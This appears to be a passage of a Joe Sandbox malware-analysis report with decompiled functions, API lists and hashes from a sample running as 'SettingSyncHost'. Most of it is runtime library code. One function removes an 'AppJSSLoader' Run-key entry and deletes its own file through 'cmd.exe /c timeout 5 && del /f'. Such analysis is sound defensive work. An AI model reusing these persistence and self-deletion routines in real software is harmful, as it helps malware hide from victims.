						_t134 = _t132 + 8 - 8;
						_t146 =  *0xfbbc50;
						 *_t134 = _t146;
						E00F93700(_v60);
						 *_t134 = _t146;
						E00F935B0(_t113);
						 *_t134 = _t146;
						E00F93460(_t113);
						 *_t134 = _t146;
						E00F93340();
						st0 = _t146;
						_t107 = _v48;
						_t114 =  *((intOrPtr*)(_t107 + 0x50));
						 *((intOrPtr*)(_v60 + 0x20)) =  *((intOrPtr*)(_t107 + 0x50));
						_t136 = _t134 + 8 - 8;
						_t147 =  *0xfbbc50;
						 *_t136 = _t147;
						E00F93700( *((intOrPtr*)(_t107 + 0x50)));
						 *_t136 = _t147;
						E00F935B0( *((intOrPtr*)(_t107 + 0x50)));
						 *_t136 = _t147;
						E00F93460(_t114);
						 *_t136 = _t147;
						_t65 = E00F93340();
						st0 = _t147;
						_t127 = _t136 + 8;
					} else {
						_v24 =  *_v24;
						continue;
					}
					break;
				}
				__eflags = _t119 - _t127 + 0xfc;
				return E00F931A1(_t65, _t119 - _t127 + 0xfc);
			}

0x00f91fe0
0x00f91ffc
0x00f92004
0x00f9200d
0x00f92010
0x00f92013
0x00f92016
0x00f9201c
0x00f9201f
0x00f92024
0x00f92027
0x00f9202c
0x00f9202f
0x00f92034
0x00f92037
0x00f9203c
0x00f9203e
0x00f92044
0x00f92044
0x00f92047
0x00f9204a
0x00f92054
0x00f9205c
0x00f9205c
0x00f9205f
0x00f92062
0x00f92068
0x00f9206b
0x00f92070
0x00f92073
0x00f92078
0x00f9207b
0x00f92080
0x00f92083
0x00f92088
0x00f92096
0x00f92099
0x00f9209c
0x00f920a2
0x00f920a5
0x00f920aa
0x00f920ad
0x00f920b2
0x00f920b5
0x00f920ba
0x00f920bd
0x00f920c2
0x00f920c4
0x00f920ca
0x00f920cd
0x00f920d0
0x00f920dd
0x00f920dd
0x00f920e3
0x00000000
0x00000000
0x00f920ef
0x00f920f2
0x00f920f5
0x00f920fb
0x00f920fe
0x00f92103
0x00f92106
0x00f9210b
0x00f9210e
0x00f92113
0x00f92116
0x00f9211b
0x00f9211d
0x00f92129
0x00f9212d
0x00f92130
0x00f92136
0x00f92139
0x00f9213e
0x00f92141
0x00f92146
0x00f92149
0x00f9214e
0x00f92151
0x00f92156
0x00f92161
0x00f92164
0x00f92167
0x00f9216d
0x00f92170
0x00f92175
0x00f92178
0x00f9217d
0x00f92180
0x00f92185
0x00f92188
0x00f9218d
0x00f9219b
0x00f9219e
0x00f921a1
0x00f921a4
0x00f921aa
0x00f921ad
0x00f921b2
0x00f921b5
0x00f921ba
0x00f921bd
0x00f921c2
0x00f921c5
0x00f921ca
0x00f921d2
0x00f921d5
0x00f921d8
0x00f921db
0x00f921de
0x00f921e4
0x00f921e7
0x00f921ec
0x00f921ef
0x00f921f4
0x00f921f7
0x00f921fc
0x00f921ff
0x00f92204
0x00f92206
0x00f9212b
0x00f920da
0x00000000
0x00f920da
0x00000000
0x00f92129
0x00f92219
0x00f92223

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34b022db7c3d9de386e520c94b1e28fac3f15300e21c5e98bd5da89d7a5621c7
Instruction ID: 2a56ec7b08052f8f8e6f6d903f19d36ad8911cab3edca11e32f0bfa0bc33dbae
Opcode Fuzzy Hash: 34b022db7c3d9de386e520c94b1e28fac3f15300e21c5e98bd5da89d7a5621c7
Instruction Fuzzy Hash: E351EBB0908509DBEF08FF58E88A86CFFB0FF48714F1148A9E8C456291DF355A68DB56

Uniqueness

Uniqueness Score: -1.00%

Function 00FF49A3, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30c2824e07a3d64cee2921458dbc10e4a307bd1519a1c5de43489275473cab0c
Instruction ID: 98b3215edb5260c97ca814e6332d4ac1addcc535f3d0abdbafee9c40759baa4e
Opcode Fuzzy Hash: 30c2824e07a3d64cee2921458dbc10e4a307bd1519a1c5de43489275473cab0c
Instruction Fuzzy Hash: B121B373F205394B7B0CC47E8C522BDB6E1C68C601745823EE8A6EA2C1D96CD917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 00FF4883, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 249c361861e1f06804162768f077b7610305d0c9c020e665c0db2a2796fc1ec8
Instruction ID: 6cb793ba5ee1b94ed316444fbd5392b900330f974b7a5d218181ebb5add866fa
Opcode Fuzzy Hash: 249c361861e1f06804162768f077b7610305d0c9c020e665c0db2a2796fc1ec8
Instruction Fuzzy Hash: 8811CA33F30C295B775C81AD8C1327AA1D2EBD824070F433AD826E7284E9A4DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 00FEA4CE, Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f509f8d2448dd614a59530674a118a5ec7eafcc17b1c1d6058280c35db75ccc1
Instruction ID: 921dcf6ed05e295df705acaca3e96175ba2c33229e4cdd0225f4cbed467963b9
Opcode Fuzzy Hash: f509f8d2448dd614a59530674a118a5ec7eafcc17b1c1d6058280c35db75ccc1
Instruction Fuzzy Hash: ACE08C32911268EBCB14DBDEC90898AF3ECEB44B50B1514AAF902D3150C2B8EE40D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00F94935, Relevance: 24.1, APIs: 16, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00F94935(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t19;
				void* _t42;
				intOrPtr* _t50;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t50 = E00F9A7FF(8, 1);
					_t56 = _t50;
					if(_t50 != 0) {
						_t13 = E00F9A7FF(0xd8, 1);
						 *_t50 = _t13;
						__eflags = _t13;
						if(_t13 != 0) {
							_t14 = E00F9A7FF(0x220, 1);
							 *((intOrPtr*)(_t50 + 4)) = _t14;
							__eflags = _t14;
							if(_t14 != 0) {
								E00F93C5D( *_t50, 0xfc7210);
								_t47 =  *_t50;
								_t17 = E00F94719(_a4,  *_t50, _a8);
								_pop(_t42);
								__eflags = _t17;
								if(__eflags != 0) {
									_t19 = E00F9A177(_t42, _t47, __eflags,  *((intOrPtr*)( *_t50 + 4)),  *((intOrPtr*)(_t50 + 4)));
									__eflags = _t19;
									if(_t19 == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t50 + 4)))) = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t50 + 4)))) = 1;
										L17:
										return _t50;
									}
									E00F99DFA( *((intOrPtr*)(_t50 + 4)));
									E00F99323( *_t50);
									E00F993BC( *_t50);
									E00F99DFA(_t50);
									L15:
									_t50 = 0;
									goto L17;
								}
								E00F99323( *_t50);
								E00F993BC( *_t50);
								E00F99DFA(_t50);
								goto L15;
							}
							E00F99DFA( *_t50);
							E00F99DFA(_t50);
							L8:
							goto L3;
						}
						E00F99DFA(_t50);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00F9960F(_t56))) = 0xc;
					goto L4;
				}
			}

0x00f94940
0x00f94966
0x00000000
0x00f94948
0x00f94953
0x00f94957
0x00f94959
0x00f94972
0x00f94979
0x00f9497b
0x00f9497d
0x00f9498e
0x00f94995
0x00f94998
0x00f9499a
0x00f949b3
0x00f949be
0x00f949c0
0x00f949c5
0x00f949c6
0x00f949c8
0x00f949eb
0x00f949f2
0x00f949f4
0x00f94a1c
0x00f94a21
0x00f94a23
0x00000000
0x00f94a23
0x00f949f9
0x00f94a00
0x00f94a07
0x00f94a0d
0x00f94a15
0x00f94a15
0x00000000
0x00f94a15
0x00f949cc
0x00f949d3
0x00f949d9
0x00000000
0x00f949de
0x00f9499e
0x00f949a4
0x00f94985
0x00000000
0x00f94985
0x00f94980
0x00000000
0x00f94980
0x00f9495b
0x00f94960
0x00000000
0x00f94960

APIs

__calloc_crt.LIBCMT ref: 00F9494E

Part of subcall function 00F9A7FF: Sleep.KERNEL32(00000000), ref: 00F9A827

__calloc_crt.LIBCMT ref: 00F94972
_free.LIBCMT ref: 00F94980
__calloc_crt.LIBCMT ref: 00F9498E
_free.LIBCMT ref: 00F9499E
_free.LIBCMT ref: 00F949A4
__copytlocinfo_nolock.LIBCMT ref: 00F949B3
__setlocale_nolock.LIBCMT ref: 00F949C0
___removelocaleref.LIBCMT ref: 00F949CC
___freetlocinfo.LIBCMT ref: 00F949D3
_free.LIBCMT ref: 00F949D9
__setmbcp_nolock.LIBCMT ref: 00F949EB
_free.LIBCMT ref: 00F949F9
___removelocaleref.LIBCMT ref: 00F94A00
___freetlocinfo.LIBCMT ref: 00F94A07
_free.LIBCMT ref: 00F94A0D

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 888903860-0
Opcode ID: e5b158437eb46f81930ff4c83b49e623e31d99d1282776aea2351ede1aac919e
Instruction ID: 937c460142778c55992796eea76a776948491c64a0d74f6bdc03732ab8f5a208
Opcode Fuzzy Hash: e5b158437eb46f81930ff4c83b49e623e31d99d1282776aea2351ede1aac919e
Instruction Fuzzy Hash: 472137365082019BFF31BF6EDC43E0BB7E8EF92720B21441EF48556191EE7AAC01BA51

Uniqueness

Uniqueness Score: -1.00%

Function 00FEC49D, Relevance: 19.6, APIs: 13, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00FEC4BA

Part of subcall function 00FE5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,00FECBF2,00FCB0A7,00000000,00FCB0A7,?,?,00FECE95,00FCB0A7,00000007,00FCB0A7,?,00FED48B,00FCB0A7), ref: 00FE5CD5
Part of subcall function 00FE5CBF: GetLastError.KERNEL32(00FCB0A7,?,00FECBF2,00FCB0A7,00000000,00FCB0A7,?,?,00FECE95,00FCB0A7,00000007,00FCB0A7,?,00FED48B,00FCB0A7,00FCB0A7), ref: 00FE5CE7

_free.LIBCMT ref: 00FEC4CC
_free.LIBCMT ref: 00FEC4DE
_free.LIBCMT ref: 00FEC4F0
_free.LIBCMT ref: 00FEC502
_free.LIBCMT ref: 00FEC514
_free.LIBCMT ref: 00FEC526
_free.LIBCMT ref: 00FEC538
_free.LIBCMT ref: 00FEC54A
_free.LIBCMT ref: 00FEC55C
_free.LIBCMT ref: 00FEC56E
_free.LIBCMT ref: 00FEC580
_free.LIBCMT ref: 00FEC592

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2d763d96cb8b72a6bc642761b525fa50c4665a013746ca27326321e7f9f476d5
Instruction ID: f04895c495a66a8fbb735dd19bac2f2680984f786dfd08d3555641fd92e9d705
Opcode Fuzzy Hash: 2d763d96cb8b72a6bc642761b525fa50c4665a013746ca27326321e7f9f476d5
Instruction Fuzzy Hash: 8E212132D02B509B8271EF6EE991C1A73E9BA08724B6C5C0AF486D7641CB39FC815655

Uniqueness

Uniqueness Score: -1.00%

Function 00FED2F4, Relevance: 18.1, APIs: 12, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00FED32D

Part of subcall function 00FE5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,00FECBF2,00FCB0A7,00000000,00FCB0A7,?,?,00FECE95,00FCB0A7,00000007,00FCB0A7,?,00FED48B,00FCB0A7), ref: 00FE5CD5
Part of subcall function 00FE5CBF: GetLastError.KERNEL32(00FCB0A7,?,00FECBF2,00FCB0A7,00000000,00FCB0A7,?,?,00FECE95,00FCB0A7,00000007,00FCB0A7,?,00FED48B,00FCB0A7,00FCB0A7), ref: 00FE5CE7

Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC4BA
Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC4CC
Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC4DE
Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC4F0
Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC502
Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC514
Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC526
Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC538
Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC54A
Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC55C
Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC56E
Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC580
Part of subcall function 00FEC49D: _free.LIBCMT ref: 00FEC592

_free.LIBCMT ref: 00FED34F
_free.LIBCMT ref: 00FED364
_free.LIBCMT ref: 00FED36F
_free.LIBCMT ref: 00FED391
_free.LIBCMT ref: 00FED3A4
_free.LIBCMT ref: 00FED3B2
_free.LIBCMT ref: 00FED3BD
_free.LIBCMT ref: 00FED3F5
_free.LIBCMT ref: 00FED3FC
_free.LIBCMT ref: 00FED419
_free.LIBCMT ref: 00FED431

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e8e0ae25bf72ab0eba2a1d656e042bc717a81d37df37b01c25857cf738213e1
Instruction ID: f015496b3c903996803298131d5f36bf2da741bb2dd3ccd275db785123f8c65e
Opcode Fuzzy Hash: 5e8e0ae25bf72ab0eba2a1d656e042bc717a81d37df37b01c25857cf738213e1
Instruction Fuzzy Hash: 87318231A01B809FEB61AF3ADD45B5A73E9BF04760F244819F455D7691DF34EC40A721

Uniqueness

Uniqueness Score: -1.00%

Function 00FD0790, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FD07CF
std::_Lockit::_Lockit.LIBCPMT ref: 00FD07F1
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD0811
std::_Facet_Register.LIBCPMT ref: 00FD097A
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD0992
Concurrency::cancel_current_task.LIBCPMT ref: 00FD09B4
Concurrency::cancel_current_task.LIBCPMT ref: 00FD09B9
Concurrency::cancel_current_task.LIBCPMT ref: 00FD09BE

Strings

false, xrefs: 00FD0925
true, xrefs: 00FD094B

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
String ID: false$true
API String ID: 3742692055-2658103896
Opcode ID: 640a0ba807ecec09e4150e44b079685eeb9700e4fc75b6b4bc920180ec9cff5a
Instruction ID: f2fd47791080dc6fbcbc0f30dc582f581cdbe92336dc212d1cc02b37d3f95108
Opcode Fuzzy Hash: 640a0ba807ecec09e4150e44b079685eeb9700e4fc75b6b4bc920180ec9cff5a
Instruction Fuzzy Hash: 8D61D370E00305CFDB21DFA4D941BAEB7B1AF04310F18855EE845AB381DBBAA945EBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00FD13B0, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 166registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,A87AA355), ref: 00FD1407
RegDeleteValueA.ADVAPI32(00000000,AppJSSLoader), ref: 00FD141D
GetModuleHandleA.KERNEL32(00000000), ref: 00FD1425
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00FD1438
ShellExecuteA.SHELL32(00000000,open,C:\Windows\System32\cmd.exe,?), ref: 00FD151D

Strings

/c timeout 5 && del /f , xrefs: 00FD148C
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 00FD13ED
C:\Windows\System32\cmd.exe, xrefs: 00FD14F6
AppJSSLoader, xrefs: 00FD1417
open, xrefs: 00FD14FB

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: Module$DeleteExecuteFileHandleNameOpenShellValue
String ID: /c timeout 5 && del /f $AppJSSLoader$C:\Windows\System32\cmd.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$open
API String ID: 3039155974-3588390337
Opcode ID: bbccdb1ba778cac305520de83b7f0beb8717a13ab9fa567223ea3e97bec5037b
Instruction ID: 792f502ede47f664c6cf25eebe623c6a37308afe9b333006b5a09e0a2a8658ac
Opcode Fuzzy Hash: bbccdb1ba778cac305520de83b7f0beb8717a13ab9fa567223ea3e97bec5037b
Instruction Fuzzy Hash: 445106709002089BEB28DF24DD85BEDB7B6EF05704F14419DE1499B7C1CBB9AA84DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FF4A9A, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00FF5BAF), ref: 00FF4AB3

Strings

acos, xrefs: 00FF4BE9
log, xrefs: 00FF4B10, 00FF4B1F
pow, xrefs: 00FF4B51, 00FF4BFB, 00FF4C48
exp, xrefs: 00FF4B32, 00FF4B97
asin, xrefs: 00FF4BE0
log10, xrefs: 00FF4AF5, 00FF4B04
sqrt, xrefs: 00FF4BF2

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 3a165a1df3ae6d948a67468d257f2d55ae10e1baf9954df419a680336d2265de
Instruction ID: 2f0cb3d37da8fdd4c1444ae0cd24468c2c1ba424b5e9bafe71fa24220fb4519b
Opcode Fuzzy Hash: 3a165a1df3ae6d948a67468d257f2d55ae10e1baf9954df419a680336d2265de
Instruction Fuzzy Hash: EB51677190061ECBCF248F99D9882BEBFB4FF84324F104045D781A7275CBB5A925BB44

Uniqueness

Uniqueness Score: -1.00%

Function 00FA315C, Relevance: 13.7, APIs: 9, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FA315C() {
				intOrPtr* _v8;
				void** _v12;
				struct _STARTUPINFOW _v80;
				signed int _t61;
				void* _t62;
				long _t65;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				int _t72;
				signed int _t73;
				intOrPtr* _t74;
				void* _t77;
				long _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				int _t93;
				signed char _t98;
				void* _t108;
				signed int _t110;
				signed int* _t111;
				int _t112;
				void** _t115;
				void** _t120;
				signed int _t121;

				GetStartupInfoW( &_v80);
				_push(0x40);
				_t112 = 0x20;
				_push(_t112);
				_t61 = E00F9A7FF();
				if(_t61 != 0) {
					_t2 = _t61 + 0x800; // 0x800
					 *0x10ee8c0 = _t61;
					 *0x10ee868 = _t112;
					__eflags = _t61 - _t2;
					if(_t61 >= _t2) {
						L5:
						__eflags = _v80.cbReserved2;
						if(_v80.cbReserved2 == 0) {
							L27:
							_t91 = 0;
							__eflags = 0;
							do {
								_t115 = (_t91 << 6) +  *0x10ee8c0;
								_t62 =  *_t115;
								__eflags = _t62 - 0xffffffff;
								if(_t62 == 0xffffffff) {
									L31:
									_t115[1] = 0x81;
									__eflags = _t91;
									if(_t91 != 0) {
										_t50 = _t91 - 1; // -1
										asm("sbb eax, eax");
										_t65 =  ~_t50 + 0xfffffff5;
										__eflags = _t65;
									} else {
										_t65 = 0xfffffff6;
									}
									_t108 = GetStdHandle(_t65);
									__eflags = _t108 - 0xffffffff;
									if(_t108 == 0xffffffff) {
										L43:
										_t58 =  &(_t115[1]);
										 *_t58 = _t115[1] | 0x00000040;
										__eflags =  *_t58;
										 *_t115 = 0xfffffffe;
										goto L44;
									} else {
										__eflags = _t108;
										if(_t108 == 0) {
											goto L43;
										}
										_t69 = GetFileType(_t108);
										__eflags = _t69;
										if(_t69 == 0) {
											goto L43;
										}
										_t70 = _t69 & 0x000000ff;
										 *_t115 = _t108;
										__eflags = _t70 - 2;
										if(_t70 != 2) {
											__eflags = _t70 - 3;
											if(_t70 == 3) {
												_t53 =  &(_t115[1]);
												 *_t53 = _t115[1] | 0x00000008;
												__eflags =  *_t53;
											}
										} else {
											_t115[1] = _t115[1] | 0x00000040;
										}
										_t55 =  &(_t115[3]); // -17754292
										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
										__eflags = _t72;
										if(_t72 == 0) {
											L48:
											_t68 = _t72 | 0xffffffff;
											L46:
											return _t68;
										} else {
											_t115[2] = _t115[2] + 1;
											goto L44;
										}
									}
								}
								__eflags = _t62 - 0xfffffffe;
								if(_t62 == 0xfffffffe) {
									goto L31;
								}
								_t115[1] = _t115[1] | 0x00000080;
								L44:
								_t91 = _t91 + 1;
								__eflags = _t91 - 3;
							} while (_t91 < 3);
							SetHandleCount( *0x10ee868);
							_t68 = 0;
							__eflags = 0;
							goto L46;
						}
